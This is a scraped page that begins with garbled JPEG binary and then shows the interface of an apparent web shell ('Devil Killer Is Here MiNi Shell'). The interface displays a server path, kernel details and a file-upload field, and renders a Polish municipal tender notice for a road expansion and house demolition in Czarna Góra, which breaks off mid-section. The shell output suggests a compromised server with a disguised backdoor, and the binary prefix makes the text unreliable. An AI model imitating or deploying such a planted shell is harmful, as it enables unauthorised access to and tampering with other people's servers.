JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025464901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa drogi gminnej klasy &#34;D&#34; nr K-420043 Trybsz - Czarna Góra w miejscowości Czarna Góra wraz z rozbiórką budynku mieszkalnego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bukowina Tatrzańska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892067</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 144</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bukowina Tatrzańska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ugbukowinatatrzanska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugbukowinatatrzanska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa drogi gminnej klasy &#34;D&#34; nr K-420043 Trybsz - Czarna Góra w miejscowości Czarna Góra wraz z rozbiórką budynku mieszkalnego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4a5dcd7-e773-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00254649</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00040595/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Rozbudowa drogi gminnej 420043K w km od 3+943,00 do km 4+520,60 w miejscowości Czarna Góra, Gmina Bukowina Tatrzańska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl.<br/>2.	Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>3.	Na Platformie postępowanie prowadzone jest pod nazwą: ”Rozbudowa drogi gminnej klasy &#34;D&#34; nr K-420043 Trybsz - Czarna Góra w miejscowości Czarna Góra wraz z rozbiórką budynku mieszkalnego” – znak sprawy: IZW.271.1.6.2024.<br/>4.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-propublico.pl oraz uznaje go za wiążący.<br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>6.	Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>7.	Ilekroć w niniejszej SWZ jest mowa o:<br/>1)	podpisie zaufanym – należy przez to rozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz.U. z 2023r. poz. 57);<br/>2)	podpisie osobistym – należy przez to rozumieć podpis, o którym mowa w art. z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych (t.j. Dz.U. z 2022r. poz. 67).<br/>8.	Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>1)	dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES;<br/>2)	dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES;<br/>3)	do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego).<br/>9.	Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy:<br/>1)	stały dostęp do sieci Internet;<br/>2)	posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>3)	komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>4)	zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera),<br/>5)	włączona obsługa JavaScript oraz Cookies.<br/>10.	Zamawiający dopuszcza następujący format przesyłanych danych:<br/>1)	pliki w formatach określonych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc, .docx, .xls, .xlsx; <br/>2)	w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z .Zamawiający dopuszcza .rar.<br/>3)	maksymalny rozmiar pojedynczego pliku to 120 MB, przy czym nie określa się limitu liczby plików.<br/>11.	Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych:<br/>1)	załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert;<br/>2)	oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie ”Data przesłania”;<br/>3)	o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/><br/>Wymagania szczegółowo opisano w rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale 30 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale 30 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZW.271.1.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozbudowa drogi gminnej klasy &#34;D&#34; nr K-420043 Trybsz - Czarna Góra w miejscowości Czarna Góra wraz z rozbiórką budynku mieszkalnego, składająca się z następujących zadań:<br/>1)	Zadania współfinansowanego z Rządowego Funduszu Rozwoju Dróg pn.: Rozbudowa drogi gminnej 420043K w km od 3+943,00 do km 4+520,60 w miejscowości Czarna Góra, Gmina Bukowina Tatrzańska.<br/>2)	Rozbudowa drogi na odcinku od km 4+520,60 do km 4+572,70.<br/>3)	Rozbiórka budynku mieszkalnego jednorodzinnego zlokalizowanego przy ul. Nadwodnia 38, na działkach ewid. nr 5834/2, 6395/2 w Czarnej Górze.<br/>2.	Zakres rzeczowy robót określa specyfikacja warunków zamówienia, znak: IZW.271.1.6.2024, w szczególności:<br/>1)	SWZ wraz z ogłoszeniem o zamówieniu i załącznikami.<br/>2)	Załączniki formalno-prawne i dokumentacja projektowa, STWIOR, przedmiary robót dla zadnia wymienionego w §1, ust. 1 pkt 1:<br/>a)	Decyzja nr 1/2023 z dnia 16 czerwca 2023 r., znak: AB.6740.328.2022.ASS Starosty Tatrzańskiego o zezwoleniu na realizację inwestycji drogowej z załącznikami.<br/>b)	Zatwierdzony projekt zagospodarowania terenu opracowany przez KW PROJEKT, projektant: mgr inż. Krystian Węgrzyn - komplet - załącznik do decyzji ZRID.<br/>c)	Zatwierdzony projekt architektoniczno-budowlany branża drogowa opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn - komplet - załącznik do decyzji ZRID.<br/>d)	Zatwierdzony projekt architektoniczno-budowlany branża mostowa opracowany przez KW PROJEKT, projektant: mgr inż. Piotr Kociołek - komplet - załącznik do decyzji ZRID.<br/>e)	Zatwierdzony projekt architektoniczno-budowlany branża elektroenergetyczna opracowany przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet - załącznik do decyzji ZRID.<br/>f)	Zatwierdzony projekt architektoniczno-budowlany branża teletechniczna opracowany przez KW PROJEKT, projektant: mgr inż. Witold Fircowicz - komplet - załącznik do decyzji ZRID.<br/>g)	Zatwierdzony projekt gospodarki zielenią opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn - komplet - załącznik do decyzji ZRID.<br/>h)	Zatwierdzony projekt załączniki formalne skompletowane przez KW PROJEKT mgr inż. Krystian Węgrzyn - 1 komplet, 91 stron - załącznik do decyzji ZRID.<br/>i)	Zatwierdzony przez Starostę Tatrzańskiego pismem znak: KT-I.7020.108.2023 z dnia 25.07.2023 r. Projekt organizacji ruchu.<br/>j)	Projekt techniczny wykonawczy branża drogowa (opis, plan syt. rys. 1.1-1.2, , profil podłużny rys. 2, przekroje typowe dr rys. 3.1, , przekroje typowe kd rys. 3.2, przekroje typowe zjazd chodnik rys. 3.3, przekroje typowe zjazd pobocze rys. 3.4, przekroje typowe zjazd zbrojenie prostych elementów rys. 3.5, wyloty kd rys. 4.1, wyniesione przejście dla pieszych rys. 4.2, profil wybranych zjazdów rys. 5.1, przekroje charakterystyczne rys. 5.2 i rys. 5.3) opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn.<br/>k)	STWIORB branża drogowa, opracowane przez KW PROJEKT mgr inż. Krystian Węgrzyn - komplet.<br/>l)	Projekt techniczny wykonawczy branża mostowa (opis, plan sytuacyjny rys. 1, profil podłużny rys. 2, przekrój typowy rys. 3.1, przekroje charakterystyczne rys. 3.2, zbrojenie schemat rys. 4, wykaz zbrojenia rys.: 5.A1, 5.A2, 5.A3, 5.A4, 5.A5, 5.B1, 5.B2, 5.B3, 5.B4, 5.B5, 5.C1, 5.C2, 5.C3, 5.C4, 5.C5, 5.D1, 5.D2, 5.D3, 5.D4, 5.D5,) opracowane przez KW PROJEKT, projektant: mgr inż. Piotr Kociołek.<br/>m)	STWIORB branża mostowa opracowane przez mgr inż. Piotra Kociołka - komplet.<br/>n)	Projekt techniczny wykonawczy przebudowy sieci elektroenergetycznej niskiego napięcia (część opisowa stron 23, rys.: R/E1, R/E2, R/E3, R/E4, R/E5, R/E6, R/E7, R/E8, R/E9, R/E10, R/E11, R/E12, R/E13) opracowany przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet.<br/>o)	STWIOR przebudowa sieci opracowana przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet.<br/>p)	Projekt techniczny wykonawczy budowa oświetlenia (część opisowa komplet, rys.: R/E1, R/E2, R/E3) opracowany przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet.<br/>q)	STWIOR budowa oświetlenia opracowana przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet.<br/>r)	Projekt budowlano wykonawczy branża teletechniczna (część opisowa str. 16, projekt zagospodarowania terenu rys. 2.1 i rys. 2.2, odpis protokołu narady koordynacyjnej, warunki techniczne Orange, rozpływ włókien kabla optycznego, schemat - stan istniejący do demontażu, schemat montażowy kabla optycznego, stan projektowany rys. 1, stan projektowany rys. 2.) opracowane przez KW PROJEKT, projektant mgr inż. Witold Fircowicz.<br/>s)	Przedmiar robót branża drogowa i mostowa - opracowana przez KW PROJEKT mgr inż. Krystian Węgrzyn.<br/>t)	Przedmiar robót przebudowa sieci elektroenergetycznej - opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn, na podstawie opracowania mgr inż. Marka Fałty.<br/>u)	Przedmiar robót przebudowa sieci elektroenergetycznej - opracowanayprzez KW PROJEKT mgr inż. Krystian Węgrzyn, na podstawie opracowania mgr inż. Marka Fałty.<br/>v)	Przedmiar robót przebudowa sieci teletechnicznej - opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn, na podstawie opracowania mgr inż. Stanisława Rapacza.<br/>w)	Przedmiar robót kanał technologiczny - opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn, na podstawie opracowania mgr inż. Stanisława Rapacza.<br/>3)	Załączniki formalno-prawne i dokumentacja projektowa, STWIOR, przedmiary robót dla zadnia wymienionego w §1, ust. 1 pkt 2:<br/>a)	Wniosek o decyzję o zezwoleniu na realizację inwestycji drogowej złożony do Starosty Tatrzańskiego w dniu 20.01.2023r. (decyzja wraz zatwierdzonym projektem budowlanym i załącznikami formalnymi zostanie dołączona do postępowania po jej wydaniu przez Starostę Tatrzańskiego. W przypadku nieuzyskania decyzji Zamawiający zastrzega sobie rezygnacje z tej części zamówienia.<br/>b)	Projekty budowlany - po wydaniu przez Starostę Tatrzańskiego decyzji o zezwoleniu na realizacje inwestycji drogowej i zatwierdzeniu projektu.<br/>c)	Projekt techniczny wykonawczy branża drogowa (część opisowa stron 21, plan sytuacyjny rys. 1, profil podłużny rys. 2, przekroje typowe dr rys. 3.1, prekroje typowe kd rys. 3.2, przekroje typowe zjazd chodnik rys. 3.3, przekroje typowe zjazd pobocze rys. 3.4, przekroje typowe zjazd zbrojenie prostych elementów rys. 3.5, przepust i wylot kd rys. 4.1, profile wybranych zjazdów rys. 4.2, przekroje charakterystyczne rys. 5.1) opracowane przez KW PROJEKT mgr inż. Krystian Węgrzyn.<br/>d)	STWIORB branża drogowa, stron 124, opracowane przez KW PROJEKT mgr inż. Krystian Węgrzyn - komplet.<br/>e)	Projekt techniczny wykonawczy branża mostowa (opis, plan sytuacyjny rys. 1, profil podłużny rys. 2, przekrój typowy rys. 3.1, przekroje charakterystyczne rys. 3.2, zbrojenie schemat rys. 4, wykaz zbrojenia rys.: 5.A1, 5.A2, 5.A3, 5.A4, 5.A5, 5.B1, 5.B2, 5.B3, 5.B4, 5.B5, 5.C1, 5.C2, 5.C3, 5.C4, 5.C5, 5.D1, 5.D2, 5.D3, 5.D4, 5.D5,) opracowane przez KW PROJEKT, projektant: mgr inż. Piotr Kociołek.<br/>f)	STWIORB branża drogowa, stron 43, opracowane przez KW PROJEKT, projektant mgr inż. Piotr Kociołek.<br/>g)	Projekt techniczny wykonawczy budowa oświetlenia (część opisowa komplet, rys.: R/E1, R/E2, R/E3) opracowany przez KW PROJEKT, projektant: mgr inż. Marek Fałta - komplet.<br/>h)	STWIOR budowa oświetlenia, stron 9, opracowana przez KW PROJEKT, projektant: mgr inż. Marek Fałta.<br/>i)	Projekt budowlano wykonawczy branża teletechniczna - etap II (część opisowa str. 16, projekt zagospodarowania terenu rys. 2.1 i rys. 2.2, odpis protokołu narady koordynacyjnej, warunki techniczne Orange, rozpływ włókien kabla optycznego, schemat - stan istniejący do demontażu, schemat montażowy kabla optycznego, stan projektowany rys. 1, stan projektowany rys. 2.) opracowane przez KW PROJEKT, projektant mgr inż. Witold Fircowicz.<br/>j)	STWIOR przebudowa sieci teletechnicznej, stron 22, opracowane przez KW PROJEKT, projektant mgr inż. Witold Fircowicz.<br/>k)	Przedmiar robót branża drogowa i mostowa, opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn.<br/>l)	Przedmiar robót budowa oświetlenia, opracowany przez KW PROJEKT, projektant: mgr inż. Marek Fałta.<br/>m)	Przedmiar robót kanał technologiczny - opracowany przez KW PROJEKT mgr inż. Krystian Węgrzyn, na podstawie opracowania mgr inż. Stanisława Rapacza.<br/>4)	Załączniki formalno-prawne i dokumentacja projektowa, STWIOR, przedmiary robót dla zadnia wymienionego w §1, ust. 1 pkt 3:<br/>a)	Decyzja nr 556/18 z dnia 21 listopada 2018 r., znak: AB.6741.23.2018.KL o pozwoleniu na rozbiórkę.<br/>b)	Uzgodnienie rozbiórki przez GDDKiA pismem nr O.KR.Z-3.4350.13.39.2018.mw.1 z dnia 05.09.2018 r.<br/>c)	Projekt rozbiórki opracowany przez mgr inż.,. arch Pawła Polaka z września 2018 r. - komplet.<br/>d)	STWIOR rozbiórki opracowana przez mgr inż. Wojciecha Koptę stron 24.<br/>e)	Dokumentacja fotograficzna opracowana przez mgr inż. Wojciecha Koptę stron 14 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45232200-4 - Roboty pomocnicze w zakresie linii energetycznych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w 